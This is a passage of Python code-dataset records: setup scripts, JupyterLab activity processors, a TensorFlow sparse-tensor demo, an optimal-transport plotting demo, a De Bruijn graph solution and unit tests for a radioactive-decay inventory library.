url=\"https://github.com/data-workspaces/data-workspaces-core\",\n packages=find_packages(),\n include_package_data=True, # needed for copying data files at install time\n python_requires=\">=3.6\",\n install_requires=[\n 'click',\n 'requests',\n 'dws-repo2docker'\n ],\n entry_points=\"\"\"\n [console_scripts]\n dws=dataworkspaces.__main__:main\n git-fat=dataworkspaces.third_party.git_fat:main\n \"\"\",\n classifiers=[\n \"Programming Language :: Python :: 3 :: Only\",\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: MacOS\",\n \"Operating System :: POSIX :: Linux\",\n \"Operating System :: POSIX\",\n \"Operating System :: Microsoft :: Windows :: Windows 10\",\n \"Topic :: Software Development :: Version Control\",\n \"Topic :: Scientific/Engineering :: Information Analysis\"\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"205806567","text":"# Copyright (c) 2017 FlashX, LLC\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\nfrom typing import (Any, Dict, List)\n\nfrom lmcommon.logging import LMLogger\nfrom lmcommon.activity.processors.processor import ActivityProcessor, ExecutionData\nfrom lmcommon.activity import ActivityRecord, ActivityDetailType, ActivityDetailRecord, ActivityAction\nfrom lmcommon.labbook import LabBook\n\nlogger = LMLogger.get_logger()\n\n\nclass JupyterLabCodeProcessor(ActivityProcessor):\n \"\"\"Class to process code records into activity detail records\"\"\"\n\n def process(self, result_obj: ActivityRecord, data: List[ExecutionData],\n status: Dict[str, Any], metadata: Dict[str, Any]) -> ActivityRecord:\n \"\"\"Method to update a result object based on code and result data\n\n Args:\n result_obj(ActivityNote): An object containing the note\n data(list): A list of ExecutionData instances containing the data for this record\n status(dict): A dict containing the result of git status from gitlib\n metadata(str): A dictionary containing Dev Env specific or other developer defined data\n\n Returns:\n ActivityRecord\n \"\"\"\n # If there was some code, assume a cell was executed\n result_cnt = 0\n for cell_cnt, cell in enumerate(data):\n for result_entry in reversed(cell.code):\n if result_entry.get('code'):\n # Create detail record to capture executed code\n adr_code = ActivityDetailRecord(ActivityDetailType.CODE_EXECUTED, show=False,\n action=ActivityAction.EXECUTE,\n importance=max(255-result_cnt, 0))\n\n adr_code.add_value('text/markdown', f\"```\\n{result_entry.get('code')}\\n```\")\n adr_code.tags = cell.tags\n\n result_obj.add_detail_object(adr_code)\n\n result_cnt += 1\n\n # Set Activity Record Message\n cell_str = f\"{cell_cnt} cells\" if cell_cnt > 1 else \"cell\"\n result_obj.message = f\"Executed {cell_str} in notebook {metadata['path']}\"\n\n return result_obj\n\n\nclass JupyterLabFileChangeProcessor(ActivityProcessor):\n \"\"\"Class to process file changes based on git-status into activity detail records\"\"\"\n\n def process(self, result_obj: ActivityRecord, data: List[ExecutionData],\n status: Dict[str, Any], metadata: Dict[str, Any]) -> ActivityRecord:\n \"\"\"Method to update a result object based on code and result data\n\n Args:\n result_obj(ActivityNote): An object containing the note\n data(list): A list of ExecutionData instances containing the data for this record\n status(dict): A dict containing the result of git status from gitlib\n metadata(str): A dictionary containing Dev Env specific or other developer defined data\n\n Returns:\n ActivityRecord\n \"\"\"\n for cnt, filename in enumerate(status['untracked']):\n # skip any file in .git or .gigantum dirs\n if \".git\" in filename or \".gigantum\" in filename:\n continue\n\n activity_type, activity_detail_type, section = LabBook.infer_section_from_relative_path(filename)\n\n adr = ActivityDetailRecord(activity_detail_type, show=False, importance=max(255-cnt, 0),\n action=ActivityAction.CREATE)\n if section == \"LabBook Root\":\n msg = f\"Created new file `{filename}` in the LabBook Root.\"\n msg = f\"{msg}Note, it is best practice to use the Code, Input, and Output sections exclusively.\"\n else:\n msg = f\"Created new {section} file `{filename}`\"\n adr.add_value('text/markdown', msg)\n result_obj.add_detail_object(adr)\n\n cnt = 0\n for filename, change in status['unstaged']:\n # skip any file in .git or .gigantum dirs\n if \".git\" in filename or \".gigantum\" in filename:\n continue\n\n activity_type, activity_detail_type, section = LabBook.infer_section_from_relative_path(filename)\n\n if change == \"deleted\":\n action = ActivityAction.DELETE\n elif change == \"added\":\n action = ActivityAction.CREATE\n elif change == \"modified\":\n action = ActivityAction.EDIT\n elif change == \"renamed\":\n action = ActivityAction.EDIT\n else:\n action = ActivityAction.NOACTION\n\n adr = ActivityDetailRecord(activity_detail_type, show=False, importance=max(255-cnt, 0), action=action)\n adr.add_value('text/markdown', f\"{change[0].upper() + change[1:]} {section} file `{filename}`\")\n result_obj.add_detail_object(adr)\n cnt += 1\n\n return result_obj\n\n\nclass JupyterLabPlaintextProcessor(ActivityProcessor):\n \"\"\"Class to process plaintext result entries into activity detail records\"\"\"\n\n def process(self, result_obj: ActivityRecord, data: List[ExecutionData],\n status: Dict[str, Any], metadata: Dict[str, Any]) -> ActivityRecord:\n \"\"\"Method to update a result object based on code and result data\n\n Args:\n result_obj(ActivityNote): An object containing the note\n data(list): A list of ExecutionData instances containing the data for this record\n status(dict): A dict containing the result of git status from gitlib\n metadata(str): A dictionary containing Dev Env specific or other developer defined data\n\n Returns:\n ActivityNote\n \"\"\"\n # Only store up to 64kB of plain text result data (if the user printed a TON don't save it all)\n truncate_at = 64 * 1000\n max_show_len = 280\n\n result_cnt = 0\n for cell in data:\n for result_entry in reversed(cell.result):\n if 'metadata' in result_entry:\n if 'source' in result_entry['metadata']:\n if result_entry['metadata']['source'] == \"display_data\":\n # Don't save plain-text representations of displayed data by default.\n continue\n\n if 'data' in result_entry:\n if 'text/plain' in result_entry['data']:\n text_data = result_entry['data']['text/plain']\n\n if len(text_data) > 0:\n adr = ActivityDetailRecord(ActivityDetailType.RESULT,\n show=True if len(text_data) < max_show_len else False,\n action=ActivityAction.CREATE,\n importance=max(255-result_cnt-100, 0))\n\n if len(text_data) <= truncate_at:\n adr.add_value(\"text/plain\", text_data)\n else:\n adr.add_value(\"text/plain\", text_data[:truncate_at] + \" ...\\n\\n \")\n\n # Set cell data to tag\n adr.tags = cell.tags\n result_obj.add_detail_object(adr)\n\n result_cnt += 1\n\n return result_obj\n\n\nclass JupyterLabImageExtractorProcessor(ActivityProcessor):\n \"\"\"Class to perform image extraction for JupyterLab activity\"\"\"\n\n def process(self, result_obj: ActivityRecord, data: List[ExecutionData],\n status: Dict[str, Any], metadata: Dict[str, Any]) -> ActivityRecord:\n \"\"\"Method to update a result object based on code and result data\n\n Args:\n result_obj(ActivityNote): An object containing the note\n data(list): A list of ExecutionData instances containing the data for this record\n status(dict): A dict containing the result of git status from gitlib\n metadata(str): A dictionary containing Dev Env specific or other developer defined data\n\n Returns:\n ActivityNote\n \"\"\"\n supported_image_types = ['image/png', 'image/jpeg', 'image/jpg', 'image/gif', 'image/bmp']\n\n # If a supported image exists in the result, grab it and create a detail record\n result_cnt = 0\n for cell in data:\n for result_entry in reversed(cell.result):\n if 'data' in result_entry:\n for mime_type in result_entry['data']:\n if mime_type in supported_image_types:\n # You got an image\n adr_img = ActivityDetailRecord(ActivityDetailType.RESULT, show=True,\n action=ActivityAction.CREATE,\n importance=max(255-result_cnt, 0))\n\n adr_img.add_value(mime_type, result_entry['data'][mime_type])\n\n adr_img.tags = cell.tags\n result_obj.add_detail_object(adr_img)\n\n # Set Activity Record Message\n result_obj.message = \"Executed cell in notebook {} and generated a result\".format(\n metadata['path'])\n\n result_cnt += 1\n\n return result_obj\n","sub_path":"lmcommon/activity/processors/jupyterlab.py","file_name":"jupyterlab.py","file_ext":"py","file_size_in_byte":10511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"442399601","text":"#-----------------------------------------------\n# -*- encoding=utf-8 -*- #\n# __author__:'焉知飞鱼' #\n# CreateTime: #\n# 2021/3/19 12:04 #\n# #\n# 天下风云出我辈, #\n# 一入江湖岁月催。 #\n# 皇图霸业谈笑中, #\n# 不胜人生一场醉。 #\n#-----------------------------------------------\nimport tensorflow as tf\nimport numpy as np\n\nindices = np.array([[0, 0], [1, 1], [2, 2], [3, 4]], dtype=np.int32)\nvalues = np.array([1, 2, 3, 4], dtype=np.int32)\nshape = np.array([5, 5], dtype=np.int32)\nx = tf.SparseTensor(values=values,indices=indices,dense_shape=shape)\nprint(x)\n\nwith tf.Session() as sess:\n result = sess.run(x)\n print(result)\n\n result_value = tf.sparse_tensor_to_dense(result)\n print('value:\\n', sess.run(result_value))","sub_path":"GAN_RL/impl1/t6.py","file_name":"t6.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"486143836","text":"# PyVot Python Variational Optimal Transportation\n# Author: Liang Mi \n# Date: April 28th 2020\n# Licence: MIT\n\nimport os\nimport sys\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom vot_numpy import VOT, VOTREG\nimport utils\n\n# -------------------------------------- #\n# --------- w/o regularization --------- #\n# -------------------------------------- #\nN0 = 1000\nmean1, cov1 = [-0.5, 0.25], [[0.02, 0], [0, 0.02]]\nmean2, cov2 = [ 0.5, 0.25], [[0.02, 0], [0, 0.02]]\nx11, x12 = np.random.multivariate_normal(mean1, cov1, N0).T\nx21, x22 = np.random.multivariate_normal(mean2, cov2, N0).T\nx = np.concatenate([np.stack((x11, x12), axis=1), np.stack((x21, x22), axis=1)], axis=0).clip(-0.99, 0.99)\n\nK = 50\nmean3, cov3 = [0.0, 0.0], [[0.02, 0], [0, 0.02]]\nmean4, cov4 = [0.5, -0.5], [[0.02, 0], [0, 0.02]]\ny11, y12 = np.random.multivariate_normal(mean3, cov3, K).T\ny21, y22 = np.random.multivariate_normal(mean4, cov4, K).T\ny = np.concatenate((np.stack((y11, y12), axis=1), np.stack((y21, y22), axis=1)), axis=0).clip(-0.99, 0.99)\nlabels = np.concatenate((np.zeros(50, dtype=np.int64), np.ones(50, dtype=np.int64)), axis=0)\n\n# ----- plot before ----- #\nxmin, xmax, ymin, ymax = -1.0, 1.0, -1.0, 1.0\ncxs_base = np.array((utils.COLOR_LIGHT_BLUE, utils.COLOR_LIGHT_RED))\ncys_base = np.array((utils.COLOR_BLUE, utils.COLOR_RED))\ncys = cys_base[labels]\nys, xs = 15, 3\n\nplt.figure(figsize=(12, 8))\nplt.subplot(231)\nplt.xlim(xmin, xmax)\nplt.ylim(ymin, ymax)\nplt.grid(True)\nplt.title('w/o reg before')\n\nplt.scatter(x[:, 0], x[:, 1], s=xs, color=utils.COLOR_LIGHT_GREY)\nfor p, cy in zip(y, cys):\n plt.scatter(p[0], p[1], s=ys, color=cy)\n\n\n# ------- run WM -------- #\nvot = VOT(y.copy(), [x.copy()], label_y=labels, verbose=False)\nprint(\"running Wasserstein clustering...\")\ntick = time.time()\nvot.cluster(max_iter_y=1)\ntock = time.time()\nprint(\"total running time : {0:g} seconds\".format(tock-tick))\ncxs = cxs_base[vot.label_x[0]]\n\n# ------ plot map ------- #\nfig232 = plt.subplot(232)\nplt.xlim(xmin, xmax)\nplt.ylim(ymin, ymax)\nplt.grid(True)\nplt.title('w/o reg map')\n\nfor p, p0 in zip(vot.y, vot.y_original):\n plt.plot([p[0], p0[0]], [p[1], p0[1]], color=np.append(utils.COLOR_LIGHT_GREY, 0.5), zorder=4)\nfor p, cy in zip(vot.y, cys):\n plt.scatter(p[0], p[1], s=ys, color=cy, facecolor='none', zorder=3)\nfor p, cy in zip(vot.y_original, cys):\n plt.scatter(p[0], p[1], s=ys, color=cy, zorder=2)\n\n\n# ------ plot after ----- #\nplt.subplot(233)\nplt.xlim(xmin, xmax)\nplt.ylim(ymin, ymax)\nplt.grid(True)\nplt.title('w/o reg after')\n\nfor px, cx in zip(vot.x[0], cxs):\n plt.scatter(px[0], px[1], s=xs, color=cx, zorder=2)\nfor py, cy in zip(vot.y, cys):\n plt.scatter(py[0], py[1], s=ys, color=cy, facecolor='none', zorder=3)\n\n\n# -------------------------------------- #\n# --------- w/ regularization ---------- #\n# -------------------------------------- #\n\n# ------- run RWM ------- #\nvot_reg = VOTREG(y.copy(), [x.copy()], label_y=labels, verbose=False)\nprint(\"running regularized Wasserstein clustering...\")\ntick = time.time()\nvot_reg.map(reg_type='potential', reg=0.01, max_iter_y=5)\ntock = time.time()\nprint(\"total running time : {0:g} seconds\".format(tock-tick))\n# cxs = cxs_base[vot_reg.label_x[0]]\n\n# Compute OT one more time to disperse the centroids into the empirical domain.\n# This does not change the correspondence but can give better visual.\n# This is optional.\nprint(\"[optional] distribute centroids into target domain...\")\nvot = VOT(vot_reg.y, vot_reg.x, label_y=labels, verbose=False)\nvot.cluster(max_iter_y=1)\ncxs = cxs_base[vot.label_x[0]]\n\n\n# ------ plot map ------- #\nplt.subplot(235)\nplt.xlim(xmin, xmax)\nplt.ylim(ymin, ymax)\nplt.grid(True)\nplt.title('w/ reg map')\n\nfor p, p0 in zip(vot.y, vot_reg.y_original):\n plt.plot([p[0], p0[0]], [p[1], p0[1]], color=np.append(utils.COLOR_LIGHT_GREY, 0.5), zorder=4)\nfor p, cy in zip(vot.y, cys):\n plt.scatter(p[0], p[1], s=ys, color=cy, facecolor='none', zorder=3)\nfor p, cy in zip(vot_reg.y_original, cys):\n plt.scatter(p[0], p[1], s=ys, color=cy, zorder=2)\n\n\n# ------ plot after ----- #\nplt.subplot(236)\nplt.xlim(xmin, xmax)\nplt.ylim(ymin, ymax)\nplt.grid(True)\nplt.title('w/ reg after')\n\nfor px, cx in zip(vot.x[0], cxs):\n plt.scatter(px[0], px[1], s=xs, color=cx, zorder=2)\nfor py, cy in zip(vot.y, cys):\n plt.scatter(py[0], py[1], s=ys, color=cy, facecolor='none', zorder=3)\n\n# ---- plot and save ---- #\nplt.tight_layout(pad=1.0, w_pad=1.5, h_pad=0.5)\nplt.savefig(\"potential.png\")\nplt.show()\n","sub_path":"demo/regVOT/potential_numpy.py","file_name":"potential_numpy.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640976261","text":"\"\"\" De Bruijn Graph from a String Problem \"\"\"\nfrom __future__ import print_function\nfrom lib_rosalind import *\n#\ndef _4c(dataset):\n k,seq = dataset\n k = k-1\n res = {}\n kmers = get_kmers(seq,k)\n for i_ in range(len(kmers)-1) :\n if kmers[i_] not in res: \n res[kmers[i_]] = [kmers[i_+1]]\n else:\n res [kmers[i_]] += [kmers[i_+1]]\n arr = []\n for i in res:\n buff = ''\n for j in sorted(res[i]):\n buff += j+','\n arr += [i+' -> '+buff.strip(',')]\n return sorted(arr)\n#\nif __name__ == '__main__':\n print ('{0} {1} {0}'.format('-'*20,'start'))\n data = Read()\n dataset = [int(data[0]),data[1]]\n print ('{0} {1} {0}'.format('-'*20,'answer'))\n res = _4c(dataset)\n print ('\\n'.join([str (i) for i in res]))","sub_path":"_4c.py","file_name":"_4c.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"346541997","text":"import pathlib\nfrom setuptools import setup, find_packages\n\n# The directory containing this file\nfile_dir = pathlib.Path(__file__).parent\n\n# The text of the README file\nreadme_txt = (file_dir / \"Readme.md\").read_text()\n\nsetup(\n name=\"stwfsapy\",\n version=\"0.01.3\",\n description=\"A library for match labels of thesaurus concepts to text\" + (\n \" and assigning scores to found occurrences.\"),\n long_description=readme_txt,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/zbw/stwfsapy\",\n author=\"Moritz Fuerneisen\",\n author_email=\"m.fuerneisen@zbw.eu\",\n license=\"Apache\",\n classifiers=[\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n ],\n packages=find_packages(exclude=(\"tests\",)),\n include_package_data=True,\n install_requires=[\"rdflib==4.2.*\", \"scikit-learn==0.22.*\"],\n tests_require=['py', 'pytest', 'pytest-mock'],\n extras_require={\n 'dev': [\n \"pytest==5.4.*\",\n \"pytest-mock==1.7.*\",\n \"pytest-pycodestyle==2.2.*\",\n \"pytest-cov==2.8.*\",\n \"codecov==2.1.*\",\n ]\n },\n python_requires='>=3.6',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"316363565","text":"\"\"\"\nUnit tests for inventory.py functions, classes and methods.\n\"\"\"\n\nimport copy\nimport unittest\nfrom unittest.mock import patch\nfrom radioactivedecay.inventory import (\n _add_dictionaries,\n _sort_dictionary_alphabetically,\n _check_dictionary,\n _sort_list_according_to_dataset,\n Inventory,\n)\nfrom radioactivedecay import DEFAULTDATA, DecayData, Radionuclide\n\n\nclass Test(unittest.TestCase):\n \"\"\"\n Unit tests for decayfunctions.py functions, classes and methods.\n \"\"\"\n\n # pylint: disable=too-many-public-methods\n\n def test__add_dictionaries(self):\n \"\"\"\n Test function which adds two inventory dictionaries together.\n \"\"\"\n\n dict1 = {\"Pm-141\": 1.0, \"Rb-78\": 2.0}\n dict2 = {\"Pm-141\": 3.0, \"Rb-90\": 4.0}\n self.assertEqual(\n _add_dictionaries(dict1, dict2),\n {\"Pm-141\": 4.0, \"Rb-78\": 2.0, \"Rb-90\": 4.0},\n )\n\n def test__sort_dictionary_alphabetically(self):\n \"\"\"\n Test the sorting of a dictionary by its keys alphabetically.\n \"\"\"\n\n inv_dict = {\"U-235\": 1.2, \"Tc-99m\": 2.3, \"Tc-99\": 5.8}\n self.assertEqual(\n _sort_dictionary_alphabetically(inv_dict),\n {\"Tc-99\": 5.8, \"Tc-99m\": 2.3, \"U-235\": 1.2},\n )\n\n def test__check_dictionary(self):\n \"\"\"\n Test the checking of inventory dictionaries.\n \"\"\"\n\n radionuclides = [\"H-3\", \"C-14\"]\n H3 = Radionuclide(\"H3\")\n C14 = Radionuclide(\"C14\")\n dataset = \"test\"\n\n # Dictionary parsing\n self.assertEqual(\n _check_dictionary({\"H-3\": 1.0}, radionuclides, dataset), {\"H-3\": 1.0}\n )\n self.assertEqual(\n _check_dictionary({\"H3\": 1.0}, radionuclides, dataset), {\"H-3\": 1.0}\n )\n self.assertEqual(\n _check_dictionary({\"3H\": 1.0}, radionuclides, dataset), {\"H-3\": 1.0}\n )\n self.assertEqual(\n _check_dictionary({\"H-3\": 1}, radionuclides, dataset), {\"H-3\": 1}\n )\n self.assertEqual(\n _check_dictionary({\"H-3\": 1}, radionuclides, dataset), {\"H-3\": 1.0}\n )\n self.assertEqual(\n _check_dictionary({\"H-3\": 1.0, \"C-14\": 2.0}, radionuclides, dataset),\n {\"H-3\": 1.0, \"C-14\": 2.0},\n )\n self.assertEqual(\n _check_dictionary({\"H-3\": 1.0, \"C-14\": 2.0}, radionuclides, dataset),\n {\"C-14\": 2.0, \"H-3\": 1.0},\n )\n self.assertEqual(\n _check_dictionary({H3: 1.0, C14: 2.0}, radionuclides, dataset),\n {\"C-14\": 2.0, \"H-3\": 1.0},\n )\n self.assertEqual(\n _check_dictionary({\"H-3\": 1.0, C14: 2.0}, radionuclides, dataset),\n {\"C-14\": 2.0, \"H-3\": 1.0},\n )\n self.assertEqual(\n _check_dictionary({H3: 1.0, \"C-14\": 2.0}, radionuclides, dataset),\n {\"C-14\": 2.0, \"H-3\": 1.0},\n )\n\n # Catch incorrect arguments\n with self.assertRaises(ValueError):\n _check_dictionary({\"H-3\": \"1.0\"}, radionuclides, dataset)\n with self.assertRaises(ValueError):\n _check_dictionary({\"1.0\": \"H-3\"}, radionuclides, dataset)\n\n def test__sort_list_according_to_dataset(self):\n \"\"\"\n Test the sorting of list of radionuclides according to their position in the decay dataset.\n \"\"\"\n\n radionuclide_list = [\"Tc-99\", \"Tc-99m\"]\n self.assertEqual(\n _sort_list_according_to_dataset(\n radionuclide_list, DEFAULTDATA.radionuclide_dict\n ),\n [\"Tc-99m\", \"Tc-99\"],\n )\n\n def test_inventory_instantiation(self):\n \"\"\"\n Test instantiation of Inventory objects.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1.0})\n self.assertEqual(inv.contents, {\"H-3\": 1.0})\n\n inv = Inventory({\"Tc-99m\": 2.3, \"I-123\": 5.8})\n self.assertEqual(inv.contents, {\"Tc-99m\": 2.3, \"I-123\": 5.8})\n\n Tc99m = Radionuclide(\"Tc-99m\")\n inv = Inventory({Tc99m: 2.3, \"I-123\": 5.8})\n self.assertEqual(inv.contents, {\"Tc-99m\": 2.3, \"I-123\": 5.8})\n\n I123 = Radionuclide(\"I-123\")\n inv = Inventory({\"Tc-99m\": 2.3, I123: 5.8})\n self.assertEqual(inv.contents, {\"Tc-99m\": 2.3, \"I-123\": 5.8})\n\n def test_inventory__change(self):\n \"\"\"\n Test Inventory _change() method.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1.0})\n inv._change({\"Tc-99m\": 2.3, \"I-123\": 5.8}, True, DEFAULTDATA)\n self.assertEqual(inv.contents, {\"Tc-99m\": 2.3, \"I-123\": 5.8})\n\n Tc99m = Radionuclide(\"Tc-99m\")\n inv = Inventory({\"H-3\": 1.0})\n inv._change({Tc99m: 2.3, \"I-123\": 5.8}, True, DEFAULTDATA)\n self.assertEqual(inv.contents, {\"Tc-99m\": 2.3, \"I-123\": 5.8})\n\n def test_inventory_radionuclides(self):\n \"\"\"\n Test Inventory radionuclides property.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1.0})\n self.assertEqual(inv.radionuclides, [\"H-3\"])\n inv = Inventory({\"Tc-99m\": 2.3, \"I-123\": 5.8})\n self.assertEqual(inv.radionuclides, [\"I-123\", \"Tc-99m\"])\n\n def test_inventory_activities(self):\n \"\"\"\n Test Inventory activities property.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1})\n self.assertEqual(inv.activities, [1.0])\n inv = Inventory({\"Tc-99m\": 2.3, \"I-123\": 5.8})\n self.assertEqual(inv.activities, [5.8, 2.3])\n\n def test_inventory___len__(self):\n \"\"\"\n Test len() on Inventory.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1})\n self.assertEqual(len(inv), 1)\n inv = Inventory({\"Tc-99m\": 2.3, \"I-123\": 5.8})\n self.assertEqual(len(inv), 2)\n\n def test_inventory_add(self):\n \"\"\"\n Test Inventory add() method to append to an inventory.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1})\n inv.add({\"C-14\": 3.0, \"K-40\": 4.0})\n self.assertEqual(inv.contents, {\"C-14\": 3.0, \"H-3\": 1.0, \"K-40\": 4.0})\n inv.add({\"H-3\": 3.0})\n self.assertEqual(inv.contents, {\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n\n inv = Inventory({\"H-3\": 1})\n inv.add({Radionuclide(\"C-14\"): 3.0, \"K-40\": 4.0})\n self.assertEqual(inv.contents, {\"C-14\": 3.0, \"H-3\": 1.0, \"K-40\": 4.0})\n inv.add({Radionuclide(\"H-3\"): 3.0})\n self.assertEqual(inv.contents, {\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n\n def test_inventory_subtract(self):\n \"\"\"\n Test Inventory subtract() method to take away a dictionary from an inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n inv.subtract({\"C-14\": 3.0, \"K-40\": 4.0})\n self.assertEqual(inv.contents, {\"C-14\": 0.0, \"H-3\": 4.0, \"K-40\": 0.0})\n\n inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n inv.subtract({\"C-14\": 3.0, Radionuclide(\"K-40\"): 4.0})\n self.assertEqual(inv.contents, {\"C-14\": 0.0, \"H-3\": 4.0, \"K-40\": 0.0})\n\n def test_inventory___add__(self):\n \"\"\"\n Test operator to add two inventory objects together.\n \"\"\"\n\n inv1 = Inventory({\"H-3\": 1.0})\n inv2 = Inventory({\"C-14\": 1.0, \"H-3\": 4.0})\n inv = inv1 + inv2\n self.assertEqual(inv.contents, {\"C-14\": 1.0, \"H-3\": 5.0})\n\n temp_data = copy.deepcopy(DEFAULTDATA)\n temp_data.dataset = \"icrp107_\"\n inv3 = Inventory({\"H-3\": 2.0}, data=temp_data)\n with self.assertRaises(ValueError):\n inv = inv1 + inv3\n\n def test_inventory___subtract__(self):\n \"\"\"\n Test operator to subtract one inventory object from another.\n \"\"\"\n\n inv1 = Inventory({\"H-3\": 1.0})\n inv2 = Inventory({\"C-14\": 1.0, \"H-3\": 4.0})\n inv = inv2 - inv1\n self.assertEqual(inv.contents, {\"C-14\": 1.0, \"H-3\": 3.0})\n\n temp_data = copy.deepcopy(DEFAULTDATA)\n temp_data.dataset = \"icrp107_\"\n inv3 = Inventory({\"H-3\": 2.0}, data=temp_data)\n with self.assertRaises(ValueError):\n inv = inv1 - inv3\n\n def test_inventory___mul__(self):\n \"\"\"\n Test operator to multiply activities in inventory by constant.\n \"\"\"\n\n inv = Inventory({\"Sr-90\": 1.0, \"Cs-137\": 1.0})\n inv = inv * 2\n self.assertEqual(inv.contents, {\"Cs-137\": 2.0, \"Sr-90\": 2.0})\n\n def test_inventory___rmul__(self):\n \"\"\"\n Test operator to right multiply constant by activities in inventory.\n \"\"\"\n\n inv = Inventory({\"Sr-90\": 1.0, \"Cs-137\": 1.0})\n inv = 2 * inv\n self.assertEqual(inv.contents, {\"Cs-137\": 2.0, \"Sr-90\": 2.0})\n\n def test_inventory___truediv__(self):\n \"\"\"\n Test operator to multiply activities in inventory by constant.\n \"\"\"\n\n inv = Inventory({\"Sr-90\": 1.0, \"Cs-137\": 1.0})\n inv = inv / 2\n self.assertEqual(inv.contents, {\"Cs-137\": 0.5, \"Sr-90\": 0.5})\n\n def test_inventory_remove(self):\n \"\"\"\n Test operator to remove radionuclides from an inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n with self.assertRaises(NotImplementedError):\n inv.remove(1.0)\n\n def test_inventory_remove_string(self):\n \"\"\"\n Test operator to remove one radionuclide from an inventory using a radionuclide string.\n \"\"\"\n\n inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n inv.remove(\"H-3\")\n self.assertEqual(inv.contents, {\"C-14\": 3.0, \"K-40\": 4.0})\n\n with self.assertRaises(ValueError):\n inv.remove(\"Be-10\")\n\n def test_inventory_remove_radionuclide(self):\n \"\"\"\n Test operator to remove one radionuclide from an inventory using a ``Radionuclide`` object.\n \"\"\"\n\n inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n inv.remove(Radionuclide(\"H-3\"))\n self.assertEqual(inv.contents, {\"C-14\": 3.0, \"K-40\": 4.0})\n\n with self.assertRaises(ValueError):\n inv.remove(Radionuclide(\"Be-10\"))\n\n def test_inventory_remove_list(self):\n \"\"\"\n Test operator to remove list of radionuclides from an inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n inv.remove([\"H-3\", \"C-14\"])\n self.assertEqual(inv.contents, {\"K-40\": 4.0})\n\n with self.assertRaises(ValueError):\n inv.remove([\"Be-10\", \"C-14\"])\n\n inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n inv.remove([\"H-3\", Radionuclide(\"C-14\")])\n self.assertEqual(inv.contents, {\"K-40\": 4.0})\n\n def test_inventory_decay(self):\n \"\"\"\n Test Inventory decay() calculations.\n \"\"\"\n\n inv = Inventory({\"H-3\": 10.0})\n self.assertEqual(inv.decay(12.32, \"y\").contents, {\"H-3\": 5.0})\n inv = Inventory({\"Tc-99m\": 2.3, \"I-123\": 5.8})\n self.assertEqual(\n inv.decay(20.0, \"h\").contents,\n {\n \"I-123\": 2.040459244534774,\n \"Tc-99\": 6.729944738772211e-09,\n \"Tc-99m\": 0.22950748010063513,\n \"Te-123\": 9.485166535243877e-18,\n \"Te-123m\": 7.721174031572363e-07,\n },\n )\n inv = Inventory({\"U-238\": 99.274, \"U-235\": 0.720, \"U-234\": 0.005})\n self.assertEqual(\n inv.decay(1e9, \"y\").contents,\n {\n \"Ac-227\": 0.2690006281740556,\n \"At-218\": 0.017002868638497183,\n \"At-219\": 2.227325201281319e-07,\n \"Bi-210\": 85.01434361515662,\n \"Bi-211\": 0.26900084425585846,\n \"Bi-214\": 85.01432618961896,\n \"Bi-215\": 2.1605054452429237e-07,\n \"Fr-223\": 0.0037122086688021884,\n \"Hg-206\": 1.6152725286830197e-06,\n \"Pa-231\": 0.2690006198549055,\n \"Pa-234\": 0.13601313171698984,\n \"Pa-234m\": 